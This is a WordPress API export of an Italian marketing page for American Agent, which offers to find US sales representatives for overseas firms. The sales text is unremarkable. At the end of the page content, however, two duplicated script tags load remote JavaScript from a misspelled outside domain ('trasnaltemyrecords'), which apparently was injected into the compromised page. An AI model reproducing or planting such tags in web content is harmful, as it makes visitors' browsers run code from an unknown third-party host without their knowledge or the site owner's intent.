{"id":3151,"date":"2014-08-16T07:17:35","date_gmt":"2014-08-16T07:17:35","guid":{"rendered":"https:\/\/americanagent.com\/sales-representative-search-2\/"},"modified":"2014-09-09T15:10:43","modified_gmt":"2014-09-09T19:10:43","slug":"come-ricercare-rappresentanti-vendite-negli-stati-uniti","status":"publish","type":"page","link":"https:\/\/americanagent.com\/it\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\/","title":{"rendered":"Come ricercare Rappresentanti vendite negli Stati Uniti"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-71fd9d3d40eb57f988992c9abcae7f16\">\n#top .av-special-heading.av-av_heading-71fd9d3d40eb57f988992c9abcae7f16{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-71fd9d3d40eb57f988992c9abcae7f16 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-71fd9d3d40eb57f988992c9abcae7f16 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-71fd9d3d40eb57f988992c9abcae7f16 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Come lavorare con Rappresentanti vendite negli Stati Uniti<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-9bf41aaed25fc1620a8ae3a04c1f84c1 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>Assumere rappresentanti del settore vendita esperti e con buona esperienza \u00e8 il miglior modo di entrare sul mercato USA. A volte la situazione richiede di assumere agenti di vendita negli Stati Uniti immediatamente.<\/p>\n<p>Siamo in grado di trovare rappresentanti vendite in America e altri esperti in materia in tutta la nazione, in qualsiasi settore e con qualsiasi livello di esperienza. Utilizziamo le stesse fonti, ma usiamo soluzioni molto pi\u00f9 economiche e comprendiamo la tua posizione internazionale e la tua preoccupazione molto meglio di qualsiasi altra societ\u00e0 americana.<\/p>\n<p>Abbiamo aiutato molte compagnie d\u2019oltreoceano a trovare i migliori rappresentanti vendite. Siamo in grado di trovare e consigliarti i migliori professionisti per la tua azienda. <strong>Infatti, contattiamo tutti gli agenti e i rappresentanti migliori<\/strong><strong>\u00a0<\/strong>e proponiamo loro il prodotto della tua azienda e ti aiutiamo nella scelta degli agenti migliori per cominciare a vendere negli Stati Uniti. In questo modo, <strong>facilitiamo l&#8217;avvio del tuo lavoro negli Stati Uniti <\/strong><strong>e ti aiutiamo<\/strong> <strong>a<\/strong><strong> gestire la tua rete di vendita<\/strong><strong>.<\/strong><\/p>\n<p>Non cerchiamo o raccomandiamo i tipici agenti, possiamo trovare e aiutarti a entrare in contatto con ottimi professionisti della vendita che saranno leali al 100% alla tua azienda, rappresentando esclusivamente la tua societ\u00e0. Per permetterci di rivolgerci ai migliori candidati ti richiediamo di offrire al tuo futuro rappresentante negli USA un compenso adeguato, incluso uno stipendio mensile standard.<\/p>\n<p>I rappresentanti vendite americani a volte sono molto prudenti durante le trattative con compagnie europee e a volte non si trova l\u2019intesa con il miglior candidato durante gli ultimi stadi della trattativa perch\u00e9 la compagnia che assume non capisce alcune delle sue valide preoccupazioni. Possiamo aiutarti a capire. Ad esempio, per le compagnie d\u2019oltreoceano pu\u00f2 essere difficile capire alcuni benefici americani (per esempio quello sull\u2019assicurazione medica). Siamo in grado di aiutarti a superare questi piccoli ostacoli e allo stesso tempo a metterti in contatto con i potenziali rappresentanti. Capiamo tutte le tue preoccupazioni e siamo in grado di spiegarti adeguatamente l\u2019importanza di questi dettagli in modo che tu possa capire i loro punti di vista. Sappiamo come superare queste problematiche.<\/p>\n<p>Trattare con agenti vendite americani \u00e8 il nostro lavoro, cos\u00ec come introdurre opportunit\u00e0 uniche e compagnie con ottimi prodotti. Siamo capaci di spiegare a queste figure professionali quali sono i benefici provenienti dall\u2019essere uno dei tuoi primi rappresentanti vendite per il territorio degli Stati Uniti.<\/p>\n<p>Se la tua strategia \u00e8 quella di assumere rappresentanti vendite negli USA, contattaci e ti daremo informazioni utili sulla tempistica e su come muoverti. American Agent ti aiuter\u00e0 a trovare agenti di commercio, rappresentanti per vendere i tuoi prodotti negli USA e costruire la tua rete di vendita negli Stati Uniti<\/p>\n<p>Contattaci e ti aiuteremo a trovare rappresentanti di vendita adatti a te.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":3,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3151","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Rappresentanti vendite negli Stati Uniti<\/title>\n<meta name=\"description\" content=\"Rappresentanti vendite per il territorio degli Stati Uniti - Come assumere rappresentanti vendite negli USA - Entrare nel mercato USA\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/it\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Rappresentanti vendite negli Stati Uniti\" \/>\n<meta property=\"og:description\" content=\"Rappresentanti vendite per il territorio degli Stati Uniti - Come assumere rappresentanti vendite negli USA - Entrare nel mercato USA\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/it\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-09T19:10:43+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/it\\\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\\\/\",\"name\":\"Rappresentanti vendite negli Stati Uniti\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:35+00:00\",\"dateModified\":\"2014-09-09T19:10:43+00:00\",\"description\":\"Rappresentanti vendite per il territorio degli Stati Uniti - Come assumere rappresentanti vendite negli USA - Entrare nel mercato USA\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/it\\\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Come ricercare Rappresentanti vendite negli Stati Uniti\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/it\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Rappresentanti vendite negli Stati Uniti","description":"Rappresentanti vendite per il territorio degli Stati Uniti - Come assumere rappresentanti vendite negli USA - Entrare nel mercato USA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/it\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\/","og_locale":"it_IT","og_type":"article","og_title":"Rappresentanti vendite negli Stati Uniti","og_description":"Rappresentanti vendite per il territorio degli Stati Uniti - Come assumere rappresentanti vendite negli USA - Entrare nel mercato USA","og_url":"https:\/\/americanagent.com\/it\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-09T19:10:43+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/it\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\/","url":"https:\/\/americanagent.com\/it\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\/","name":"Rappresentanti vendite negli Stati Uniti","isPartOf":{"@id":"https:\/\/americanagent.com\/it\/#website"},"datePublished":"2014-08-16T07:17:35+00:00","dateModified":"2014-09-09T19:10:43+00:00","description":"Rappresentanti vendite per il territorio degli Stati Uniti - Come assumere rappresentanti vendite negli USA - Entrare nel mercato USA","breadcrumb":{"@id":"https:\/\/americanagent.com\/it\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/it\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/it\/come-ricercare-rappresentanti-vendite-negli-stati-uniti\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/it\/"},{"@type":"ListItem","position":2,"name":"Come ricercare Rappresentanti vendite negli Stati Uniti"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/it\/#website","url":"https:\/\/americanagent.com\/it\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/pages\/3151","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/comments?post=3151"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/pages\/3151\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/media?parent=3151"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}